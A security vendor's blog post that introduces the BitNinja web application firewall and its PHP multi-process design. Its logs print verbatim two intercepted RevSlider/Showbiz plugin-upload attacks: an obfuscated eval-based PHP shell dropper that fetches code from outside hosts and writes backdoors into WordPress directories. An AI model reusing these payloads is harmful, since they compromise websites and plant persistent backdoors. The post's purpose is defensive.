The story of BitNinja WAF from backstage

Boglarka Angalet

BitNinja has two very efficient detection modules. Log analysis and DoS detection does a great job in filtering attacks, but they are lack of one very important thing. Log analysis can only work on requests already reached your server. There are attacks like login brute force attacks, where it is not a problem as there is a very low chance the right user/pass combination will work within a few trials. Unfortunately, there are attacks when one good targeted request is enough to hack a web application and inject infected code or alter files and gain access.


Since we started BitNinja, we were dreaming about a module that is capable to filter the traffic at the moment it reaches the server. We had the plans for a web application firewall 8 month ago, but first we focused on the most common attack. Now, as BitNinja can easily intercept many different attacks, we can focus on more sophisticated attacks. We are so excited to introduce you the beta version of BitNinja WAF!

We started to implement our WAF at the end of June 2015. We wanted to create a highly scaleable, fast and easy to extend local HTTP proxy. The first proof of concept implementation seemed to be viable on our test environment, with a couple of dozens of requests per sec. Then we tested the module on a bit larger scale and have found it doesn’t scale. The first implementation was a single threaded solution. It failed to serve the requests fast enough and ate all the CPU and crashed when we tried to increase the number of requests.

 

Back to the planning table

 

We redesigned the module for a multi-threaded version. Well, multi-threading is not one of the best features of PHP. :) We can say PHP is not suitable for classic multi-threaded applications. But we don’t wanted to drop PHP juts because of one problem. We then decided to avoid classical multi-threading and implement a multi-process application. This is how BitNinja WAF was born as it exists now. BitNinja WAF forks multiple processes to filter the incoming requests, inspect them and block/greylist malicious requests.

The processes communicate with the supervisor process with signals and shared memory, so it is blazing fast. It scales the number of filtering processes automatically based on the number of incoming traffic, and clean unused processes automatically too. It has very minimal CPU and memory footprint and so fast, you won’t experience any lag on the pageloads.

As we have started to test BitNinja WAF on our production environment, we experienced brilliant results, I want to share with you.

This is one of the attack attempt BitNinja WAF successfully intercepted just a few hours ago:

 

 

[info] +02:00 2015-10-13 10:30:36 - |WAF| Rejecting connection from IP [208.110.70.251]; WAF Filter got matching query: --xYzZY
Content-Disposition: form-data; name="action"

revslider_ajax_action
--xYzZY
Content-Disposition: form-data; name="client_action"

update_plugin
--xYzZY
Content-Disposition: form-data; name="update_file"; filename="revslider.zip"
Content-Type: application/zip

PK„˝8G revslider/˙˙PKPK7ž0Grevslider/.rev.phP.php¸GénewNight - Shell

@set_time_limit(0);
unlink("../../../../../../wp-content/plugins/revslider/temp/.htaccess");
unlink("../../../../../../wp-content/plugins/revslider/temp/update_extract/revslider.zip");
$dani = 'rUl6YtpVEP58/IrNFslTV1mauyonAlxWbxqkC2MY+iWKrMVeYBu/yV6HZUT++83s2gby1lzVCCkwr888M54xQtM4aEaexKkU0dI8YZz
VxIKYByLLuDTrrnA7zmA0vDHm7Bu7M2Ebjd8ed/V7kQnpxWwkVoccn9XqeD6HYnU++XdCYejVZzppr1POlN6CSVHf9rQT+5+Z7Vnd2XG
g9PPY34AB7fnZNYvYkqckW/EgIBEGU2oKSRlb8PDY52D5TFHCXQJAA4VhGPvcKJFKaQ3yQ8+4l6dPYSC40+vb7vXo0gb/RL9Czx54PMj
4G1NQsMG8PFpr2oFnqziT81rET2FJxRj6v9u7vJwAPbpNfifjFE+85jOxr1RGe+sTMhGYNOLrVSxK0pqzyP+8UaHlxSE9JEdEUQ/pFct
RQM6xFywiKymTSbNMkhRIlVGDMWRrbc8RUURAUUA4AHkeYAN2CZMi5nR91n2tKG2uJ8iNS5jloHyxpzeGF8QRxyGBGcniPPX4Yd8N528
yGELd/uBie9i7tg3svc8zKVV0eGc5uphd28OpOxmNpsatUtfJkRdUklSyGcSBlawSmIaUeFdollCi4zQQ8q8blNZ7BqWlB6XGvUhZdVs
KGfAutGWIrSRUxMFWYTe1vD1Cu4C+sF1ATCQT//LOCfHiANryod/vf7J6sOtFq8p00WlmXvrWTubm0NMONakFtbkgADqkEpoNizZ+kOE
Y/jDDDOwBfi78jgoUYeArBKgyS5Qst8rlRuUOqPcUNMOOTj6KLWdm1b/GXpRSHmxFxBFW1pCKwBBseF8/Ux5X1MDV80Em0zSJMxPVh1P
TwGxGmgNHBTxFmsbRVJCnXOYw+yiwwLR15sOOGAdMWF+K/v7gr8ZJ4ZEgAwhXUBLiSQBNx7gfCUYlaijtvt2tizgMbi+UZ7VSlOSSyFr
CO0fy75IScbRQvdCn+00nn4dvq9dkKLl0Tq5+34F9E5Fo

jbM9oBzaoSKEbCBSw
kWpzI58JkwJvKwGi/lOBbMkiJlC+iLgqoomTT8rcyV8n1QF2FlQ3zNLgH+hxjnEn7TI+aeO9iaKIV8r7xbZBbETH8nU3h8/FWxjM8MXV
7yAckxUsj0HDbLQ0bmsqNUF77K7szCRsBtQ+xYrM0r2vsCtnUcDf0NKIFePAgu4PCiF2rC4RZ0bo+TDuAU7coQDGMb33NWxue+i3nzRU
IaJq71gn0lLLJVSUPklkaBFvS7KbIA7x31r/B+J3rNxQu3knsezjFUQTEKDwYZ3jQk9I4/wjD0jtxj1gl1rMBRKhS708f4UiytW+e7Y/
P5xe0RYvY+4/Dv3WQyk9paenCb60p0Vsn8Rwyp9XOTfyn8yffx/8u9ccbieMSDAJrnqYeirmsEZsZrwgd8LscxGhs+1urP4d+CzVeDLT
Gh7CcgEwxml1lcy1R28WCwPBHsq9UljZloV5JCcnp42tiKIRIrS0KTaH0YqReoK+fYVhPwESFOQkaOAGS+xUlfuPaCA7y2NP8qYuDL6/
eqYv3FlZXx+0utoB5Ev+Av69VdV3tWvAK8ndTcLENtY+hzVdtd3tWHIOF7zlPvkfFCql4wPX7/0yHqrcnoD1f7q/gc=';

eval(gzinflate(str_rot13(base64_decode($dani))));
$diar = 'rUl6QuM4EP58VfwH46uUR4KE3dNWKyB1OQhUpaXtNe19TihlE7f1kjfZDtBQ/PebsZO+LBzHrraq1HFen2xzPC6XspSx5EgptSjm7m7
3a2pUzIi7J5Ti2u3ERBhSvU7/xpmyr+zOue1pf2za3encCyVnRdaFJgE5BKfOA5/CIzqM/g5UN/R3PB7GSoN1WWJELYqvW+pE+NckjMb
xcdSzBtMyXYIFcikjWEnMCWvwUZMCI6M7UivFczw/WTlLfhaFiOcA0k5unJcpa [info] +02:00 2015-10-13 10:30:39 - |WAF| Rejecting connection from IP [208.110.70.251]; WAF's RegexFilter got matching query: --xYzZY

Content-Disposition: form-data; name="action"

showbiz_ajax_action
--xYzZY
Content-Disposition: form-data; name="client_action"

update_plugin
--xYzZY
Content-Disposition: form-data; name="update_file"; filename="showbiz.zip"
Content-Type: application/zip

PKůŽ4Gshowbiz/˙˙PKPKTž0Gshowbiz/.rev.phP.php˛MénewNight - Shell

@set_time_limit(0);
unlink("../../../../../../wp-content/plugins/showbiz/temp/.htaccess");
unlink("../../../../../../wp-content/plugins/showbiz/temp/update_extract/showbiz.zip");
$dani = 'rUl6YtpVEP58/IrNFslTV1mauyonAlxWbxqkC2MY+iWKrMVeYBu/yV6HZUT++83s2gby1lzVCCkwr888M54xQtM4aEaexKkU0dI8YZzV
xIKYByLLuDTrrnA7zmA0vDHm7Bu7M2Ebjd8ed/V7kQnpxWwkVoccn9XqeD6HYnU++XdCYejVZzppr1POlN6CSVHf9rQT+5+Z7Vnd2XGg9
PPY34AB7fnZNYvYkqckW/EgIBEGU2oKSRlb8PDY52D5TFHCXQJAA4VhGPvcKJFKaQ3yQ8+4l6dPYSC40+vb7vXo0gb/RL9Czx54PMj4G1
NQsMG8PFpr2oFnqziT81rET2FJxRj6v9u7vJwAPbpNfifjFE+85jOxr1RGe+sTMhGYNOLrVSxK0pqzyP+8UaHlxSE9JEdEUQ/pFctRQM6
xFywiKymTSbNMkhRIlVGDMWRrbc8RUURAUUA4AHkeYAN2CZMi5nR91n2tKG2uJ8iNS5jloHyxpzeGF8QRxyGBGcniPPX4Yd8N528yGELd
/uBie9i7tg3svc8zKVV0eGc5uphd28OpOxmNpsatUtfJkRdUklSyGcSBlawSmIaUeFdollCi4zQQ8q8blNZ7BqWlB6XGvUhZdVsKGfAut
GWIrSRUxMFWYTe1vD1Cu4C+sF1ATCQT//LOCfHiANryod/vf7J6sOtFq8p00WlmXvrWTubm0NMONakFtbkgADqkEpoNizZ+kOEY/jDDDO
wBfi78jgoUYeArBKgyS5Qst8rlRuUOqPcUNMOOTj6KLWdm1b/GXpRSHmxFxBFW1pCKwBBseF8/Ux5X1MDV80Em0zSJMxPVh1PTwGxGmgN
HBTxFmsbRVJCnXOYw+yiwwLR15sOOGAdMWF+K/v7gr8ZJ4ZEgAwhXUBLiSQBNx7gfCUYlaijtvt2tizgMbi+UZ7VSlOSSyFrCO0fy75IS
cbRQvdCn+00nn4dvq9dkKLl0Tq5+34F9E5Fo

jbM9oBzaoSKEbCBSwkWpzI58JkwJvKwGi/lOBbMkiJlC+iLgqoomTT8rcyV8n1QF2FlQ3zNLgH+hxjnEn7TI+aeO9iaKIV8r7xbZBbETH
8nU3h8/FWxjM8MXV7yAckxUsj0HDbLQ0bmsqNUF77K7szCRsBtQ+xYrM0r2vsCtnUcDf0NKIFePAgu4PCiF2rC4RZ0bo+TDuAU7coQDGM
b33NWxue+i3nzRUIaJq71gn0lLLJVSUPklkaBFvS7KbIA7x31r/B+J3rNxQu3knsezjFUQTEKDwYZ3jQk9I4/wjD0jtxj1gl1rMBRKhS7
08f4UiytW+e7Y/P5xe0RYvY+4/Dv3WQyk9paenCb60p0Vsn8Rwyp9XOTfyn8yffx/8u9ccbieMSDAJrnqYeirmsEZsZrwgd8LscxGhs+1
urP4d+CzVeDLTGh7CcgEwxml1lcy1R28WCwPBHsq9UljZloV5JCcnp42tiKIRIrS0KTaH0YqReoK+fYVhPwESFOQkaOAGS+xUlfuPaCA7
y2NP8qYuDL6/eqYv3FlZXx+0utoB5Ev+Av69VdV3tWvAK8ndTcLENtY+hzVdtd3tWHIOF7zlPvkfFCql4wPX7/0yHqrcnoD1f7q/gc=';

eval(gzinflate(str_rot13(base64_decode($dani))));
$diar = 'rUl6QuM4EP58VfwH46uUR4KE3dNWKyB1OQhUpaXtNe19TihlE7f1kjfZDtBQ/PebsZO+LBzHrraq1HFen2xzPC6XspSx5EgptSjm7m73a2
pUzIi7J5Ti2u3ERBhSvU7/xpmyr+zOue1pf2za3encCyVnRdaFJgE5BKfOA5/CIzqM/g5UN/R3PB7GSoN1WWJELYqvW+pE+NckjMbxcdSzB
tMyXYIFcikjWEnMCWvwUZMCI6M7UivFczw/WTlLfhaFiOcA0k5unJcpaknwSoZd8tREPKml0FiIHp1dhvH14CKEAIPLWG38vLvDM8XfsOqD
kVbNcsVyABkXpdLTcsFl7q4KZexifGlkMQKWmpL5nS4lBPkvp0RrPRiHG0E5E5lYC/5DiPlPe0ZJpJ/nKPSSMqf7hBqe6D69b1dx5A95Civ
IT+vqyPdbqopIMVJiVSIu7zmidVcoCAh7ht1FgrTFVg3qFx1iGrwm6qUFMQyJmdtBzZ/h+MZWsrLgODE4MKqscsI3VMCJzlS94Ti+7H0J+3
TXoXDGIOVXCxKsrS4G55PrsD+OVIPB2Ln1qC9lNufKSgBMwO+jpapNRzghkluKer59bwNpegE/ZHyO3jU+VGl8wChMlISedaEzfgrt7SNzZ
UCiBc+yE9/KQqbyFHh1jHQlnC4l/uHBVJKUGfTq10LmA4an1Fty9OiJP105akAY19DpgLrUgwJwEAAr2gjdrlS7780xAQcooRZ2YCLlWGuE
CKsUHiXztWX+rWUT1rvybusgIcVzxrV2cWo7zKwuEi3KgkcPkIzgcSUPqT1uCYrsHGnqQHYpq0W5qN9qfMeMoUTtoS7jhURoDz6gT2Vdw8F
AiQfGel+fNuRzxhv5eCm+J8MbCZokVZcDZ8mc5Lg8gOUhLkbCWf0Bpadik2xe5jl5j5a8E0RHtSZtTPGAd/6oKU5+A5rkKd3WU/U0F3i9jV
DJPct3834H9j4iO2iO

t5FldY4JkdeZFhWT2tgdpFmzFmxbDknzPyVZqqxxKbkUGTdy+HX9opqFVUZeNHWVxb5yMAP/U41mia+0yfnJU3sTUp8/GO8jsglvIz6ydr0
//N7kwQUOD5QkGUYq0HnLwYJ5Z2eqStzagrfo3UuqyNiNcJ3btU0bj0fgba/W87/XMThNnwYOOD0ZhUzDuGqjG6elxLkFO3Bx5jAv72x5o/
M0UwP3SBedSrFog127T+OZNA2YnxIKq7U7pJ0KuBRsijvhmdgVWbb0RJ0kXCmiTuR9Gw4W19GQ0HDyeUHbC5KboWJMhjNvKHiUbHfuqnOlS
JJiQdBi7QQdmg8sd4U7PuaPPGQxktl1aYh89KVbeHL7Bs3XEMoGw03xoxDK78IgdC0EOQMA2KzY3CrgDbeKgljG8+EL7zMxryXDUGFh42EL
EDw3/0CQH0DtcYocccxsFfi/'; 

$aulia = 'zZdYYqswEFP3lfof2OUhgfeNFN1a1XI3al9EGMC6jrH8uNBJ/e9aIhMIuJRPSM8qaZgwJ8h0Pk6zaHNronbJn6CmV6v1CndVSZvN2+3Nn9
Nlvapl0E6htbgjJIV0GprDq8mjpCDnUiiBZZobnpNXhFbJNWNaBDM55Yo8lzrStQ7Cx8AuagIkZmLkIQgzbNxhQtvVc2puVcyxeTFQuYiBH
WKdlhV0cpwGbrwYdBHLC6+DQ5VTJtCAR0gV/aMcS5jHr6DjVRqSRAaKiE+cO+4Du9odP51420QUg44Z6KToPMLJXXT0bbj/O/n2++6tL0Jk
RZvTFZk5j1saEH0QOxRU37JgQ6BuwaTChenXlXU6/6YaWs/ZinyvnUiE8hTq6Ee+aMF8LtLXitkK23vr+PHVpffbG2AKqCO4RwGMPWjiq/3
CaohoVvxt3CXBbvEVkcPh2Tj7HwD6We25QwtDOsbP7b5fQeES+upno1VBFxEe72OlqJMMm4dfUq0HHx1W7NHLXpwOAnukabHr12iOhq6CsS
B/RBoOWoifN94D3EVrHiKWAsngdXVDDAsL43tASwyPUMESOOV6QTGOkO7R4GMLTDj3qTC5hiWUezj43fsfy/Gw7v2jKS67Mmk0clKslC6ks
TnbeX0nesvhah60HDgmTocHwwx1ZDzb34L4875yY5naOdEoZWrIg8U0XNnr4MJyHpL8HQIhMmSQrUZdHWx0fXv/AA==';

$path = $_SERVER['DOCUMENT_ROOT'].'/'.'wp-index2.php';
$path2 = $_SERVER['DOCUMENT_ROOT'].'/'.'aulia.php';
$content = " ";
$cont2 = " ";
if(file_exists($path)) @unlink($path);
$txt = fopen($path,"a+");
fwrite($txt, $content);
fclose($txt);
if(file_exists($path2)) @unlink($path2);
$txt2 = fopen($path2,"a+");
fwrite($txt2, $cont2);
fclose($txt2);

$file = file_get_contents("http://debi-umzug.ch/tmp/os.txt") ;
$r=fopen("os.php", "w"); fwrite($r,$file); fclose($r);
$r=fopen("../../../../../../os.php", "w"); fwrite($r,$file); fclose($r);
?>


$file = file_get_contents("http://kpml.osvitakp.com.ua/downloads/my-cache/error.txt") ;
$r=fopen("error.php", "w"); fwrite($r,$file); fclose($r);
$r=fopen("../../../../../../error.php", "w"); fwrite($r,$file); fclose($r);
?>


$file = file_get_contents("http://kpml.osvitakp.com.ua/downloads/my-cache/index.up.txt") ;
$r=fopen("index.up.php", "w"); fwrite($r,$file); fclose($r);
$r=fopen("../../../../../../index.up.php", "w"); fwrite($r,$file); fclose($r);
?>


$file = file_get_contents("http://kpml.osvitakp.com.ua/downloads/my-cache/media-template.txt") ;
$r=fopen("media-output.php", "w"); fwrite($r,$file); fclose($r);
$r=fopen("../../../../../../wp-includes/media-output.php", "w"); fwrite($r,$file); fclose($r);
?>


$file = file_get_contents("http://kpml.osvitakp.com.ua/downloads/my-cache/class-http.txt") ;
$r=fopen("class-resource.php", "w"); fwrite($r,$file); fclose($r);
$r=fopen("../../../../../../wp-includes/class-resource.php", "w"); fwrite($r,$file); fclose($r);
?>˙˙PKwŕĎUź˛PKůŽ4Gshowbiz/PKTž0GwŕĎUź˛;showbiz/.rev.phP.phpPKx9
--xYzZY--

 

Wow, cool, isn’t it? :) What would have happened without WAF? We would have seen one log enty, something like this:

abc.com 348.351.331.327 - - [05/Oct/2015:19:39:05 +0200] "POST /wp-admin/admin-ajax.php?action=revslider_ajax_action HTTP/1.1" 404 62352 "-" "Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0"

 

No log analysis, nor the best sysadmin can tell you this request is hacking a whole website, infecting 5 files of the CMS and planting 2 PHP shell backdoors and doing severe damages to your website.

Since we started testing BitNinja WAF on production servers, in the last 2 days it has intercepted dozens of such dangerous requests. The WAF module is crucial in the fight against hackers, as this way you can stop hacks before it even reaches your web server.

 

When will BitNinja WAF be available for you to test?

We plan to keep testing it this week and release a new version next week with the new WAF module. WAF will be disabled by default at the first time and you will be able to enable or disable it on the dashboard to experiment with it on any server with one click. We will update you as soon as the new version is ready for update.

 

Have a nice hacker hunting!


Share your ideas with us about this article

Previous posts

HostingCon Europe 2015 with the BitNinja team
HostingCon Europe was such a fun event this year and provided a way different experience for us, than being an exhibitor back in San Diego, at the global event. Fizzing atmosphere, great exhibitors, excellent organization and various visitors guaranteed our great time during this couple of days. Some warming up We are so proud to say that we have ninjas from all over the world by now. Building a strong community is essential to make the internet a safer place. As you know, the Netherlands has an exceptional importance in the IT strategy of Europe. In this context, has an important...
New dashboard function: filter your incidents by server or domain
We are happy to announce a long-awaited function at the BitNinja dashboard that facilitates your job to analyze attacks. The first step was to make the incident flow more transparent and clear for you. Many of you have a significant number of servers with huge traffic day by day. As you know, on average, 50% of the traffic consists of bots – most of them aren’t the good ones – and in the upper cases, it means lots of successfully avoided attacks and BitNinja incident logs also. You will no longer need to scroll for long minutes to analyze the current problem as we provide a one-...